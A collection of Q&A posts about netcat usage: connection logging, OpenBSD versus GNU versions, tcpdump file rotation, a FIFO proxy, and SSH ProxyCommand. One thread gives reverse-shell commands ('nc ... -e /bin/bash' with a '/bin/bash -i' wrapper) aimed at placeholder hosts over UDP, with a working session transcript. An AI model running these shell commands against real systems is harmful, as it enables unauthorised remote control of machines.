I am using netcat utility on linux to receive outputs from a program on a windows machine. My problem being that the program on the windows machine does not always give an output.
How can i check that either a connection has been made to netcat ?
What i am doing till now is "nc -l -v 9103 > output" then i check the size of output, the problem this poses is that netcat only write to a file after a certain buffer size has been reached or a new line char is encountered, so some cases evne though a connection has been made the file size is detected as zero.
How can i check if someone has made a connection with netcat.
I tried using
nc -l -v -e someprog.exe 9103 > output
but my netcat doesnt seem to support this
below are the options i have
$ nc -h
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-i secs Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-p port Specify local port for remote connects
-r Randomize remote ports
-s addr Local source address
-T ToS Set IP Type of Service
-C Send CRLF as line-ending
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]
verbose mode will write connectivity to stderr, and you can redirect stderr to a file, the verbose log has something like
connect to [xxx] from [xxxx]
try
nc -l -v -p 9103 -k 1> output 2>connect.log
and monitor connect.log for connectivity
if you don't use -k , netcat quits after 1st connection.
If you can upgrade your copy of netcat: the modern versions (1.10, for one) have an option to execute a program (or a shell command) upon connect. Otherwise, you can make the netcat think it runs in a terminal (to disable buffering of stdout), by using for example script (it just saves everything on stdin/stdout/stderr in the given file). Or use logging features of screen and tmux.
Related
netcat command that installed on Ubuntu 20.04.01 by default has -X option, but netcat 0.7.1 compiled from source code does not have -X option. What is the difference?
netcat that installed on Ubuntu 20.04.01:
foo#foo:~/data/tmp$ netcat --help
netcat: invalid option -- '-'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
netcat 0.7.1 compiled from the source code:
foo#foo:~/data/tmp$ ./netcat/bin/netcat --help
GNU netcat 0.7.1, a rewrite of the famous networking tool.
Basic usages:
connect to somewhere: ./netcat/bin/netcat [options] hostname port [port] ...
listen for inbound: ./netcat/bin/netcat -l -p port [options] [hostname] [port] ...
tunnel to somewhere: ./netcat/bin/netcat -L hostname:port -p port [options]
Mandatory arguments to long options are mandatory for short options too.
Options:
-c, --close close connection on EOF from stdin
-e, --exec=PROGRAM program to exec after connect
-g, --gateway=LIST source-routing hop point[s], up to 8
-G, --pointer=NUM source-routing pointer: 4, 8, 12, ...
-h, --help display this help and exit
-i, --interval=SECS delay interval for lines sent, ports scanned
-l, --listen listen mode, for inbound connects
-L, --tunnel=ADDRESS:PORT forward local port to remote address
-n, --dont-resolve numeric-only IP addresses, no DNS
-o, --output=FILE output hexdump traffic to FILE (implies -x)
-p, --local-port=NUM local port number
-r, --randomize randomize local and remote ports
-s, --source=ADDRESS local source address (ip or hostname)
-t, --tcp TCP mode (default)
-T, --telnet answer using TELNET negotiation
-u, --udp UDP mode
-v, --verbose verbose (use twice to be more verbose)
-V, --version output version information and exit
-x, --hexdump hexdump incoming and outgoing traffic
-w, --wait=SECS timeout for connects and final net reads
-z, --zero zero-I/O mode (used for scanning)
Remote port number can also be specified as range. Example: '1-1024'
The netcat from Ubuntu is Open BSD one :
$ netcat -help
OpenBSD netcat (Debian patchlevel 1.206-1ubuntu1)
And you compiled the GNU version:
$ ./netcat/bin/netcat --help
GNU netcat 0.7.1, a rewrite of the famous networking tool.
This post discusses the differences between both.
I am new to writing script and not sure whether I am correct in writing such script for tcpdump to collect pcap info.
tcpdump -s 0 port ftp or ssh or http or https -i eth0 -w mycap.pcap
#run the tcpdump and store all the info in mycap.pcap
sudo kill -2 #for exit purpose
This enables me to run tcpdump which is good, however, I wish to stop this (due to the space for mycap.pcap meet the max capacity of 3GB per file) automatically via the same script and run again but this time round, I will store it in another file (eg. mycap1.pcap)
Then the cycle goes again until I stop the process by pressing crtl+c
Can this be done?
You don't need to write a script for that.
tcpdump -C <filesize> -s 0 port ftp or ssh or http or https -i eth0 -w mycap.pcap
Have a look at the man-page for tcpdump.
I'm trying to set up a reverse shell between two Linux machines (Kali v. 1.0.9), using the default installation of netcat.
Using the commands below, I was able to make a connection and relay text information between the two machines:
Listener:
nc -luvvp <port>
Client:
nc -uvv <ip> <port>
However, modifying the client's arguments to include executing bash upon a connection:
nc -uvv <ip> <port> -e /bin/bash
And no connection is made, I'm not quite sure how to get this to work, this doesn't seem to be a problem that other people have experienced and was unsure of how to solve the issue. It might also help to know that these commands work fine using the normal TCP mode, it's only after adding the u flag that it stops working for shells. Any help would be appreciated, thanks!
I did some experiments and realized that tunneling shell session via netcat over UDP is almost impossible. The bash does not know that the underlying file descriptor is the UDP socket bash calls read() with buffer size 1. That is fine for interactive shell but when received UDP datagram contains more than 1 byte then data is lost (except the first byte in the datagram).
The netcat uses the standard line buffer at the stdin and the whole line is sent in a single UDP datagram. But bash reads only the first byte from each line.
The other problem is that the client netcat exucuted via command
nc -uvv -e "/bin/bash" <ip> <port>
does not send any data to server because the bash is executed in non-interactive mode and it just waits for a command. The solution is to write a script to execute bash in the interactive mode:
$ cat bashinteractive
#!/bin/bash
/bin/bash -i
and call server
$ nc -luvvp <port>
and client
nc -uvv -e "./bashinteractive" <ip> <port>
But the usage is very inconvenient. It is possible to write command on server when each byte is followed by ENTER
$ ./nc -luvvp 6666
listening on [any] 6666 ...
connect to [10.0.2.15] from xxx.yyy.zzz [10.0.2.16] 37552
$ c
cd
d
/
/
$ l
ls
s
-
-l
l
total 92
drwxr-xr-x 2 root root 4096 Feb 7 15:22 bin
....
drwxr-xr-x 13 root root 4096 Oct 16 2013 var
$ e
ex
xi
it
t
exit
sent 30, rcvd 1422 : Connection refused
So my recommendation is to use other tool than netcat. Perhaps you can try
http://code.google.com/p/udptunnel/
I am trying to follow a number of recipes which use netcat or ideally knc (kerberos netcat) to create a proxy; either to look at what is being piped through the proxy for debugging or to create an kerberos authenticated link over which I can tunnel some java based tcp server-to-server traffic.
Taking this example http://notes.tweakblogs.net/blog/7955/using-netcat-to-build-a-simple-tcp-proxy-in-linux.html the pattern seems to be something like:
mkfifo fifo
nc -l -p 8080 <fifo | nc tweakers.net 80 >fifo
Yet that gives the error:
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]
Yet if I run ether side of the pipe alone I get no error:
nc -l -p 8080 <fifo
nc tweakers.net 80 >fifo
What am I missing to get this to work?
I am running Red Hat Enterprise Linux Server release 6.2 (Santiago) either bash or ksh.
Annoyingly it was the -p option which was tripping things up. The following command runs fine:
nc -l 8080 <fifo | nc somehost.com 80 >fifo
Then in another shell doing
telnet localhost 8080
get /
works fine.
I have a webserver WWW1 and a front-facing proxy PRX. I use SSH ProxyCommand to connect to WWW1's internal IP (private IP) via PRX (private+public IP). For some connections (not all) I see a network connection left open after I'm finished. These add up!
~/.ssh/config
Host *
ServerAliveInterval 5
ControlMaster auto
ControlPath ~/.ssh/master-%r#%h:%p
Host WWW1 WWW2 WWW3
User foo
ProxyCommand ssh -q -a -x PRX nc %h 22
IdentityFile ~/.ssh/id_foo_WWWx
On PRX, lsof | grep WWW1:ssh shows 124 open connections at the moment. On WWW1, the same command shows 243 open connections. There are similar open connections for WWW2, WWW3 etc.
WWW1 and PRX are Debian. Client connections are coming from a mix of Debian, Ubuntu and OSX10.6. I use Emacs Tramp but this has no special configuration (AFAIK) outside of my ~/.ssh/config.
I'm concerned about running out of internal ports, and ideally I want these connections to clean themselves up without intervention. Ideally by configuring them to kill themselves off; failing that a command I can kill old processes with is fine!
A better way would be to use the -W option of SSH, so you could put
ProxyCommand ssh -q -a -x PRX -W %h:22
instead of
ProxyCommand ssh -q -a -x PRX nc %h 22
This way you get rid of dependence on nc too.
Don't know whether it matters but I use nc -w 1 %h %p